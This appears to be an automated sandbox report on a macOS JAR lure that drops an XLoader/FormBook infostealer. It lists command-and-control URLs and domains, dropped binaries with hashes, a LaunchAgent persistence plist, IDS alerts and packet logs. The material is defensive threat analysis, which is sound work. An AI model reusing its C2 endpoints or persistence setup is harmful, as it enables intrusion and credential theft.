www.electricbrandsusa.com	91.195.240.94	true	false		unknown
lidokeyhomes.info	34.102.136.180	true	false	0%, Virustotal, Browse	unknown
drlindaydevenish.com	72.29.74.90	true	false	0%, Virustotal, Browse	unknown
exploringelleblog.com	66.235.200.145	true	true		unknown
zincfacemask.com	184.168.131.241	true	false		unknown
www.rshuahui.com	154.201.255.27	true	false		unknown
www.hypesoleco.com	204.11.56.48	true	false		unknown
www.decoratudo.com	75.2.26.18	true	false		unknown
www.iregentos.info	63.250.34.223	true	false		unknown
www.dutythrow.com	66.96.147.113	true	false		unknown
www.noaccountbet-ci.com	unknown	unknown	false		unknown
www.natchbricks.com	unknown	unknown	false		unknown
www.cmdp0o7mi0-e.info	unknown	unknown	false		unknown
www.clinclan.com	unknown	unknown	false		unknown
www.drlindaydevenish.com	unknown	unknown	false		unknown
www.exploringelleblog.com	unknown	unknown	false		unknown
www.lidokeyhomes.info	unknown	unknown	false		unknown
www.ssmjoin.com	unknown	unknown	false		unknown
www.newrayfreight.com	unknown	unknown	false		unknown
www.zincfacemask.com	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.dutythrow.com/09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM	false	Avira URL Cloud: safe	unknown
http://www.iregentos.info/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg=	false	Avira URL Cloud: safe	unknown
http://www.drlindaydevenish.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ=	false	Avira URL Cloud: safe	unknown
http://www.decoratudo.com/09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM	false	Avira URL Cloud: safe	unknown
http://www.zincfacemask.com/09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM	false	Avira URL Cloud: safe	unknown
http://www.lidokeyhomes.info/09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM	false	Avira URL Cloud: safe	unknown
http://www.hypesoleco.com/09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM	false	Avira URL Cloud: safe	unknown
http://www.rshuahui.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI=	false	Avira URL Cloud: safe	unknown
http://www.electricbrandsusa.com/09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE=	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://java.oracle.com/	java, 00000555.00000246.9.00000001025ab000.00000001025c8000.r-x.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.electricbrandsusa.com	Germany	47846	SEDO-ASDE	false
204.11.56.48	www.hypesoleco.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	false
154.201.255.27	www.rshuahui.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
66.96.147.113	www.dutythrow.com	United States	29873	BIZLAND-SDUS	false
184.168.131.241	zincfacemask.com	United States	26496	AS-26496-GO-DADDY-COM-LLCUS	false
63.250.34.223	www.iregentos.info	United States	22612	NAMECHEAP-NETUS	false
2.20.214.243	unknown	European Union	16625	AKAMAI-ASUS	false
66.235.200.145	exploringelleblog.com	United States	13335	CLOUDFLARENETUS	true
72.29.74.90	drlindaydevenish.com	United States	33182	DIMENOCUS	false
34.102.136.180	lidokeyhomes.info	United States	15169	GOOGLEUS	false
75.2.26.18	www.decoratudo.com	United States	16509	AMAZON-02US	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
91.195.240.94	FORM.EXE	Get hash	malicious	Browse	www.lifeliveslive.com/sm3l/?-Z3tZ=APZpfhcXHdrp&6lHx=8VpSNnaWpOQZ+7JbBTGbcvYv6nE1QuXCCAmf52gXAApKdLyXQ8w6xFKyN59TjENZqoMQ+kOcBg==
	QxnlprRUTx.exe	Get hash	malicious	Browse	www.janieleconte.com/dy8g/?Jn=Gt5vUzfLQFM/0mhPJ9CqdSAFBufwmBZMUw2YDtf4R6ruceCKXj/U9tnaVWJz+Hj9cz3b&2dM8l=bXbDpfbx6FA04L
	INVOICE.exe	Get hash	malicious	Browse	www.vr859.com/p6f2/?fJEpdH6=soyizY5cDa4OaE7P56LSa2j5aXgnc6htIe/9XGi1qskxXirQHug4V9iL/51VCIxzjbC1&5j=2dNhChI
	Signed PEARLTECH contract and PO.exe	Get hash	malicious	Browse	www.n2yta.com/u8aa/?q8_LqJ=cqwp3jahoZpp8bTm7YeXrH/TSOhv31xbQ5sl0rI2UumDJX6iBOlf6r18k2TvJHV9shWv&0bc01=-ZE0
	Order.exe	Get hash	malicious	Browse	www.valiantfinancial.net/hth0/?VD=EDHLUDGP7nzt&a0GXI6H=fq0pUUsMykhpakIYLB0UOPeltmaadKDQAyGS2nmoU6EPyoDRQHhGNDGFhI3yGcGgG5o5
	PO_8356.pdf.exe	Get hash	malicious	Browse	www.templatejar.com/ogpo/?7n0lq=lM9VKjRYwYPmdA2v+Fh4NFXhOwr/qiAwMsejhFQ//zxhOyqpFwSBXY3Sl7EQv5rKdhsPjIW9Rw==&hnQLA0=d2MtV2hhcv98DBGP
	Rq0Y7HegCd.exe	Get hash	malicious	Browse	www.janieleconte.com/dy8g/?3f=Gt5vUzfLQFM/0mhPJ9CqdSAFBufwmBZMUw2YDtf4R6ruceCKXj/U9tnaVWJZh3T9Yx/b&XRtpal=y48HaFr
	PI.exe	Get hash	malicious	Browse	www.rentyoursubmarine.com/q4kr/?p6A=Ls814W5cEEroXO7EG8JEA8SaZ2X/5OKhmR7DB1Htt8z7lvl4lBYUeyYrf08neM1FLKht&UDK0fp=0FQt7
	Ejima.exe	Get hash	malicious	Browse	www.cannabimall.com/eo5u/?B0D=6lcLAVTp7F9TDN&j48=0R9uar6YmRK6CyoJAtxSglMHzMLppgfXXHrx7gH2qUTXEUy42bkNyQIav4tEda5uDSap
	Purchase_Order.exe	Get hash	malicious	Browse	www.stays.travel/uqf5/?6lU=cB64Yhz&oli=0c1cxJmDFclVRjcO7b5Dg3T+dsQKUp1HVD5PR8JJO29AGxDMUCtmEYvr4dBLnRtVpIhQ
	PO# 0499699.exe	Get hash	malicious	Browse	www.nuskinhk.com/u6e4/?U6ApY=rTbZoia8ZrSLLKVd1jYuoiAZrGZffbbBY/287cYY09W/kVEWF1VyJJlbdOYrHwxogUS3&l0DL=bT6Hn4EpFnWH
	Proforma Invoice & Bank Swift Copy.exe	Get hash	malicious	Browse	www.orangebeachreviews.com/zrmt/?0v34_=SUH52hj0aQmiV0Sw50EDyegABuu/43b9tqoTDkeNov+i3+zU6FrNteO6RulBfMJIZZGq&lFQ=VN6dz2vp4
	Swift_Report.exe	Get hash	malicious	Browse	www.providenceoffices.com/m3rc/?m6W4u=aKJfjQ4Xm+LJIZ6BNgkPYoN44Kyofr6isW05/Z5O1S7pCIX150OaH40Kw9gi0+YuK6nV&gJBPYB=4huxslfxL6VH_
	PO#X2021-621.pdf.exe	Get hash	malicious	Browse	www.providenceoffices.com/m3rc/?rTWhMB=aKJfjQ4Xm+LJIZ6BNgkPYoN44Kyofr6isW05/Z5O1S7pCIX150OaH40Kw+AYkv4WQdGS&r48Ld=WroXO
	PR#28201909R1.exe	Get hash	malicious	Browse	www.moulardfarms.net/dp3a/?ZTVtjJ=hjwae6xYdLTx5OcOZnTOf16UDqRcchaC6xesFIAzUbdLEX4raNoveuuNguMXQDWXXxvh&nP_P=7nELdf8
	LEMOH.exe	Get hash	malicious	Browse	www.outerspacemeditation.com/aipc/?_vZ8Z=4hrPElJHXtGDm6&U6A=SRY9IG6Ajz+vE63Y3VEOHBl74k+S+40v702Yg2HNMZ6vicIyTlwI8qjzY7e3WsMSINEItkjWdA==
	rtgs_2021-06-07_02-01.exe	Get hash	malicious	Browse	www.bobdj99.com/uecu/?E4k=2/2CNfe5oxz1NU/aM0X0RjTNCyPbJ7TndDeKSNBHkiu7RRupV0YuoN8GwvCebBw+enDQ&3f30dp=Zf0HXpXHq84PAdrP
	rtgs_pdf.exe	Get hash	malicious	Browse	www.bobdj99.com/uecu/?4h=2/2CNfe5oxz1NU/aM0X0RjTNCyPbJ7TndDeKSNBHkiu7RRupV0YuoN8GwsiOUggGACqX&6lP4=KX-DbxrPVhL
	Invoice number FV0062022020.exe	Get hash	malicious	Browse	www.codeminers.productions/grb/?4hOh3f=JCtLHqhcGcpYDoGUTMfFxKbOAcuV9i6GhZW3aHBHw3ZMQEMFHpnAXSGddOx/HlTj8IEe&rZ_PWR=AL0hw0R0lbS
	Order.exe	Get hash	malicious	Browse	www.gp7.finance/jogt/?w6ATB0=RZ1M7k9p2b5dyn+zEFjRlZUNk+g+hUiZjaOuKcEdnAoB7FLE0a9NJR1t2K/OE+ySApAW&Jxox=Er6tXhMxl

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.iregentos.info	Inv_7623980.exe	Get hash	malicious	Browse	63.250.34.223
	FeDex Shipment Confirmation.exe	Get hash	malicious	Browse	63.250.34.223
	catalogo TAWI group.exe	Get hash	malicious	Browse	63.250.34.223
	current productlist.exe	Get hash	malicious	Browse	63.250.34.223

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CONFLUENCE-NETWORK-INCVG	mal.exe	Get hash	malicious	Browse	209.99.64.55
	vjsBNwolo9.js	Get hash	malicious	Browse	204.11.56.48
	Inv_7623980.exe	Get hash	malicious	Browse	204.11.56.48
	Y-20211907-00927735_pdf.exe	Get hash	malicious	Browse	204.11.56.48
	OpqhGKdDwO.exe	Get hash	malicious	Browse	209.99.40.222
	jnl3kWNWWS.exe	Get hash	malicious	Browse	208.91.197.27
	request for quote.exe	Get hash	malicious	Browse	208.91.197.91
	2GuNlCn0X6.exe	Get hash	malicious	Browse	208.91.197.27
	G1638.exe	Get hash	malicious	Browse	204.11.56.48
	VLC_32.exe	Get hash	malicious	Browse	208.91.196.145
	seBe6bgLTw.exe	Get hash	malicious	Browse	209.99.40.222
	doc.exe	Get hash	malicious	Browse	208.91.197.91
	DOC00368.exe	Get hash	malicious	Browse	208.91.197.91
	PO=List Orders 2921TYP001 - Xls.exe	Get hash	malicious	Browse	208.91.197.91
	SEOCHANG INDUSTRY Co., Ltd..exe	Get hash	malicious	Browse	209.99.40.222
	Order=bcm_28062021.exe	Get hash	malicious	Browse	208.91.197.27
	SEOCHANG INDUSTRY Co., Ltd..exe	Get hash	malicious	Browse	209.99.40.222
	Invoice confirmation & NEW PO for 2 sets of items.exe	Get hash	malicious	Browse	208.91.197.39
	h3Ls1L8ZOL	Get hash	malicious	Browse	208.91.197.238
	0rder-bcm_23062021.exe	Get hash	malicious	Browse	208.91.197.27
SEDO-ASDE	FORM.EXE	Get hash	malicious	Browse	91.195.240.94
	QxnlprRUTx.exe	Get hash	malicious	Browse	91.195.240.94
	INVOICE.exe	Get hash	malicious	Browse	91.195.240.94
	Signed PEARLTECH contract and PO.exe	Get hash	malicious	Browse	91.195.240.94
	Order.exe	Get hash	malicious	Browse	91.195.240.94
	soa-032119.exe	Get hash	malicious	Browse	91.195.240.12
	vBY00twOiW.exe	Get hash	malicious	Browse	91.195.240.13
	PO_8356.pdf.exe	Get hash	malicious	Browse	91.195.240.94
	92F1219F1DD31F00412579B846E77B61F1A6E3E1F039E.exe	Get hash	malicious	Browse	91.195.240.87
	TNT AWB 9066721066.exe	Get hash	malicious	Browse	91.195.240.68
	Rq0Y7HegCd.exe	Get hash	malicious	Browse	91.195.240.94
	qMN6oFyrux.exe	Get hash	malicious	Browse	91.195.240.13
	PI.exe	Get hash	malicious	Browse	91.195.240.94
	Ejima.exe	Get hash	malicious	Browse	91.195.240.94
	Purchase_Order.exe	Get hash	malicious	Browse	91.195.240.94
	PO# 0499699.exe	Get hash	malicious	Browse	91.195.240.94
	Proforma Invoice & Bank Swift Copy.exe	Get hash	malicious	Browse	91.195.240.94
	Swift_Report.exe	Get hash	malicious	Browse	91.195.240.94
	PO#X2021-621.pdf.exe	Get hash	malicious	Browse	91.195.240.94
	PR#28201909R1.exe	Get hash	malicious	Browse	91.195.240.94

JA3 Fingerprints

No context

Dropped Files

No context

Runtime Messages

Command:	open "/Users/berri/Desktop/Statement SKBMT 09818.jar" --args
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Created / dropped Files

/Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/Info.plist Download File
Process:	/Users/berri/kIbwf02l
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	789
Entropy (8bit):	5.180262477000295
Encrypted:	false
SSDEEP:	12:TMHdgo+tJVEdQiCXFnInAYwjDXX2FEXa6GX24oIQKKGYsH/fej7X2jiTAHlvlL:2dfyiwl6wuMa6X4oRwYsH/femusdL
MD5:	C634299D9C9B5D3887E162BA3180932A
SHA1:	FB9532F11CD90710D28AECD564049C29C294DA07
SHA-256:	3B3C816F258484F94047B3D1F9CA7DA3E78BDA9850783985C96FD1CAFFD1D200
SHA-512:	D19BD71CC12674E78BAD703265311D57B76F44B6E1D5AF9BBB3D445229EE979FF27984F0071CC4CE263C3CD90A63E718FF56F86DA616D54EFDD8B69D01268982
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>NBNlRBXH</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>NBNlRBXH</string>..<key>CFBundlePackageType</key>..<string>APPL</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleVersion</key>..<string>1</string>..<key>LSMinimumSystemVersion</key>..<string>10.6</string>..<key>NSMainNibFile</key>..<string>NBNlRBXH</string>..<key>NSPrincipalClass</key>..<string>NSApplication</string>..<key>LSUIElement</key>..<true/>.</dict>.</plist>

/Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH Download File
Process:	/Users/berri/kIbwf02l
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL>
Category:	dropped
Size (bytes):	127808
Entropy (8bit):	6.978905266650247
Encrypted:	false
SSDEEP:	3072:Q8+OzCmILFHKLDWykiGmGtIm5NtrUQhPgOGGO:QBE/ILRxyn8O8NtrUU
MD5:	A17BF4533D7EC677A0D4BDAE19E41FF2
SHA1:	7EDEAD477048B47D2AC3ABDC4BAEF12579C3C348
SHA-256:	97D6B194DA410DB82D9974AEC984CFF8AC0A6AD59EC72B79D4B2A4672B5AA8AA
SHA-512:	7EB633C3BF9A96629F7E110BC446DC3EC74D4E247818B36BA61F5C630CFBFDCE83B9DECAE085C2A984C58E0F5210A1CE74BD21111B0FFD7724B0D33E96C0C99C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XLoader, Description: Yara detected XLoader, Source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	....................@...............H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..................>.......................................__stubs.........__TEXT..........>...............>...............................__stub_helper...__TEXT..........D...............D...............................__const.........__TEXT..........`.......@.......`...............................__unwind_info...__TEXT..................H...............................................__DATA..........................................................__nl_symbol_ptr.__DATA..........................................................__la_symbol_ptr.__DATA..............................................................H...__LINKEDIT..............@...............@......................."...0...................................(...P.......................H.......P...........................................

/Users/berri/Library/LaunchAgents/com.gLUpQD8hXDj8.NBNlRBXH.plist Download File
Process:	/Users/berri/kIbwf02l
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	483
Entropy (8bit):	5.356909880107165
Encrypted:	false
SSDEEP:	12:TMHdgo+tJVEdQiCXFMinXAy9MheWBXOYX+NEVjB:2dfyiwYA2OOT
MD5:	0DB629ABB12FE87D4F7E78CB68ACC0C6
SHA1:	1E13D504A3B9D296F1119FA4E4E48100FB7E755B
SHA-256:	801BE304F03A74292C74760A78F2BD45711D7BF92EEBAA8F97E9EC5A71BF8747
SHA-512:	F7E9C02C0F1CEBAB9941555E05DFB0E4C1A183AB41C906CBF1A8081E6A4FC5F02B65183C184688FA2826803E9EA9762A1CD25F7739856F6AD4ED73735460C029
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>Label</key>..<string>com.gLUpQD8hXDj8.NBNlRBXH</string>. <key>ProgramArguments</key>..<array>.. <string>/Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH</string>.. <string>start</string>..</array>. <key>RunAtLoad</key>..<true/>. <key>KeepAlive</key>..<false/>.</dict>.</plist>

/Users/berri/NVFFY.ico Download File
Process:	/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java
File Type:	MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	4414
Entropy (8bit):	4.671051082873236
Encrypted:	false
SSDEEP:	96:bz4SIArhGGE0UYsXXabUaAr77r6AqcTy9:bK2hGz0UBXXuUaAr77Wvm
MD5:	9EC34483059C834D13BF5A149C36040C
SHA1:	C42848A12BFD182528293BC709EBAE0F1CD022AA
SHA-256:	940856E7725751F11AE810EF0D7B3076FD79DE64D7BA7DE763E08A731B99D92C
SHA-512:	5F392D2C8A1E88639E99F8636E38EFD967C44CEB0EA50A821783EF86398ADA7DF7B046CDC18E3174E930D2BC2048622C849FEF8016A0B63F2A6042FB27496C59
Malicious:	false
Reputation:	low
Preview:	...... .... .(.......(... ...@..... ....................................................................................................................................................................................................................................................................................................................................................g..z@..p2...................................................................................................^..w=..l)..i!..k#..n*..j#..{>................................................................................W..t7..k&..i!..k%..o+..q/..r0..r0..r0..o,..y;..................................................................K..r3..j$..i!..l&..o,..q/..r0..r0..r0..r0..r0..r0..r0..o+..z=...............................................................D..f...p,..r0..r0..r0..r0..r0..r0..r0..r0..r0..r0..r0..r0..o+..z=..............................................................y:..o+..r0..r0..r0..r0..r0..r0..r

/Users/berri/kIbwf02l Download File
Process:	/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL>
Category:	dropped
Size (bytes):	127808
Entropy (8bit):	6.978905266650247
Encrypted:	false
SSDEEP:	3072:Q8+OzCmILFHKLDWykiGmGtIm5NtrUQhPgOGGO:QBE/ILRxyn8O8NtrUU
MD5:	A17BF4533D7EC677A0D4BDAE19E41FF2
SHA1:	7EDEAD477048B47D2AC3ABDC4BAEF12579C3C348
SHA-256:	97D6B194DA410DB82D9974AEC984CFF8AC0A6AD59EC72B79D4B2A4672B5AA8AA
SHA-512:	7EB633C3BF9A96629F7E110BC446DC3EC74D4E247818B36BA61F5C630CFBFDCE83B9DECAE085C2A984C58E0F5210A1CE74BD21111B0FFD7724B0D33E96C0C99C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XLoader, Description: Yara detected XLoader, Source: /Users/berri/kIbwf02l, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	....................@...............H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..................>.......................................__stubs.........__TEXT..........>...............>...............................__stub_helper...__TEXT..........D...............D...............................__const.........__TEXT..........`.......@.......`...............................__unwind_info...__TEXT..................H...............................................__DATA..........................................................__nl_symbol_ptr.__DATA..........................................................__la_symbol_ptr.__DATA..............................................................H...__LINKEDIT..............@...............@......................."...0...................................(...P.......................H.......P...........................................

/dev/null Download File
Process:	/Applications/Preview.app/Contents/MacOS/Preview
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	875
Entropy (8bit):	5.1907135518437295
Encrypted:	false
SSDEEP:	12:ASfKtrPtXhF4FS5XjKG7xfiGWIpUkf9UxFf9UXQzUQljleVxRsh:ruzBhF4FyTdVK62kFIFTxlAVxe
MD5:	2EE511965EE74120F6DA88C59A7CA6F5
SHA1:	DF573289F60542E4A77E64ADFC4CA0AB8541FDAC
SHA-256:	8644DCEF0071B01C482618653A3387891CF3B8CE8105513B5E5413BFED8E1A6E
SHA-512:	7A3B4B4F3E16B0A67D13D06D0C1FDDC9F6777ED9F4878E26D559B663A12F3DCACC4112E31AF90D687C47107DBE179E569115CB976A5AFADD1EB0163F9555B388
Malicious:	false
Reputation:	low
Preview:	2021-07-22 16:10:35.546 Preview[558:5087] ApplePersistence=NO.2021-07-22 16:10:35.867 Preview[558:5087] WARNING: The SplitView is not layer-backed, but trying to use overlay sidebars.. implicitly layer-backing for now. Please file a radar against this app if you see this..2021-07-22 16:10:35.892 Preview[558:5087] Validation of item with tag AKTagToolHighlight failed. Implement hasHighlightableSelectionForAnnotationController: on the delegate to add support..objc[558]: Class FIFinderSyncExtensionHost is implemented in both /System/Library/PrivateFrameworks/FinderKit.framework/Versions/A/FinderKit (0x7fffacddab68) and /System/Library/PrivateFrameworks/FileProvider.framework/OverrideBundles/FinderSyncCollaborationFileProviderOverride.bundle/Contents/MacOS/FinderSyncCollaborationFileProviderOverride (0x11280fcd8). One of the two will be used. Which one is undefined..

/private/var/folders/ql/8wfqxrtx52n95h35b6cz4nyw0000gn/T/hsperfdata_berri/555 Download File
Process:	/Library/Java/JavaVirtualMachines/jdk-11.0.2.jdk/Contents/Home/bin/java
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	7DEA362B3FAC8E00956A4952A3D4F474
SHA1:	05FE405753166F125559E7C9AC558654F107C7E9
SHA-256:	AF5570F5A1810B7AF78CAF4BC70A660F0DF51E42BAF91D4DE5B2328DE0E83DFC
SHA-512:	1B7409CCF0D5A34D3A77EAABFA9FE27427655BE9297127EE9522AA1BF4046D4F945983678169CB1A7348EDCAC47EF0D9E2C924130E5BCC5F0D94937852C42F1B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........

Static File Info

General
File type:	Zip archive data, at least v2.0 to extract
Entropy (8bit):	7.9996738485409375
TrID:	Java Archive (13504/1) 62.80% ZIP compressed archive (8000/1) 37.20%
File name:	Statement SKBMT 09818.jar
File size:	733857
MD5:	4ded6a1d590e8a31ae6b9ea0ffb3331d
SHA1:	b8c0167341d3639eb1ed2636a56c272dc66546fa
SHA256:	81c4276f2e3c0ed456b08402a6a5b63d0cad68220b7a3275b3cbf0ba73faaa21
SHA512:	50389e307389b4804a53c6e68b745a200b1502c1609f49ee8f4792672477b725be8f90cd0cc8d3dd493605111b54d0a4ee3e24cfb4575bb54a57ee703e929748
SSDEEP:	12288:ayzdYmpxeT8UVWFnotCNUeiTw60kOfu8EWpoef/dOAMQ5yRYZQdk:aYY+a8zFnou4w6vMnoe9jMQZ9
File Content Preview:	PK........3..R................META-INF/..PK..............PK........3..R................META-INF/MANIFEST.MFM....0...@...uHh..vk.c.....m"...$)R...E......h.C......l.9.(.._R....R....(i...$..._........X..{..q~t.c:X.......P.%7..B.....j...^......J.N.=..Gcf..&m$

Archive ZIP

Archived Files

File Path	File Attributes	File Size
META-INF	D	0
META-INF/MANIFEST.MF		203
oBSrz	D	0
oBSrz/AES.class		1320
oBSrz/OBSrz.class		6203
resources	D	0
resources/NVFFY		4416
resources/fI4sWHk		623632
resources/kIbwf02l	A	127824

Extracted Files

Extracted File
File path:	resources/NVFFY
File size:	4416
File type:	data

Extracted File
File path:	resources/fI4sWHk
File size:	623632
File type:	data

Extracted File
File path:	resources/kIbwf02l
File size:	127824
File type:	data

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/22/21-14:11:15.299110	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49194	80	192.168.11.11	66.235.200.145
07/22/21-14:11:15.299110	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49194	80	192.168.11.11	66.235.200.145
07/22/21-14:11:15.299110	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49194	80	192.168.11.11	66.235.200.145
07/22/21-14:11:36.966597	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49197	75.2.26.18	192.168.11.11
07/22/21-14:11:43.958416	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49199	34.102.136.180	192.168.11.11
07/22/21-14:12:15.282163	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49204	80	192.168.11.11	66.235.200.145
07/22/21-14:12:15.282163	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49204	80	192.168.11.11	66.235.200.145
07/22/21-14:12:15.282163	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49204	80	192.168.11.11	66.235.200.145
07/22/21-14:12:36.183384	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49207	75.2.26.18	192.168.11.11
07/22/21-14:12:42.671834	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49209	34.102.136.180	192.168.11.11

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 14:10:34.160293102 CEST	49180	443	192.168.11.11	17.171.27.65
Jul 22, 2021 14:10:34.160515070 CEST	49180	443	192.168.11.11	17.171.27.65
Jul 22, 2021 14:10:34.271536112 CEST	443	49180	17.171.27.65	192.168.11.11
Jul 22, 2021 14:10:34.271615982 CEST	443	49180	17.171.27.65	192.168.11.11
Jul 22, 2021 14:10:34.271787882 CEST	443	49180	17.171.27.65	192.168.11.11
Jul 22, 2021 14:10:34.271925926 CEST	49180	443	192.168.11.11	17.171.27.65
Jul 22, 2021 14:10:34.272020102 CEST	49180	443	192.168.11.11	17.171.27.65
Jul 22, 2021 14:10:44.688116074 CEST	49191	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:10:44.858194113 CEST	80	49191	184.168.131.241	192.168.11.11
Jul 22, 2021 14:10:44.858724117 CEST	49191	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:10:44.858800888 CEST	49191	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:10:45.027041912 CEST	80	49191	184.168.131.241	192.168.11.11
Jul 22, 2021 14:10:45.059792042 CEST	80	49191	184.168.131.241	192.168.11.11
Jul 22, 2021 14:10:45.059828997 CEST	80	49191	184.168.131.241	192.168.11.11
Jul 22, 2021 14:10:45.060008049 CEST	49191	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:10:45.060141087 CEST	49191	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:10:45.060189962 CEST	49191	80	192.168.11.11	184.168.131.241
Jul 22, 2021 14:10:45.229257107 CEST	80	49191	184.168.131.241	192.168.11.11
Jul 22, 2021 14:10:48.405358076 CEST	49193	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:10:48.530709028 CEST	80	49193	72.29.74.90	192.168.11.11
Jul 22, 2021 14:10:48.531119108 CEST	49193	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:10:48.531388044 CEST	49193	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:10:48.656488895 CEST	80	49193	72.29.74.90	192.168.11.11
Jul 22, 2021 14:10:49.671097040 CEST	80	49193	72.29.74.90	192.168.11.11
Jul 22, 2021 14:10:49.671663046 CEST	49193	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:10:49.671749115 CEST	49193	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:10:49.680692911 CEST	80	49193	72.29.74.90	192.168.11.11
Jul 22, 2021 14:10:49.680751085 CEST	80	49193	72.29.74.90	192.168.11.11
Jul 22, 2021 14:10:49.681253910 CEST	49193	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:10:49.681344986 CEST	49193	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:10:49.797178030 CEST	80	49193	72.29.74.90	192.168.11.11
Jul 22, 2021 14:10:49.797674894 CEST	49193	80	192.168.11.11	72.29.74.90
Jul 22, 2021 14:10:58.548036098 CEST	49189	80	192.168.11.11	2.20.214.243
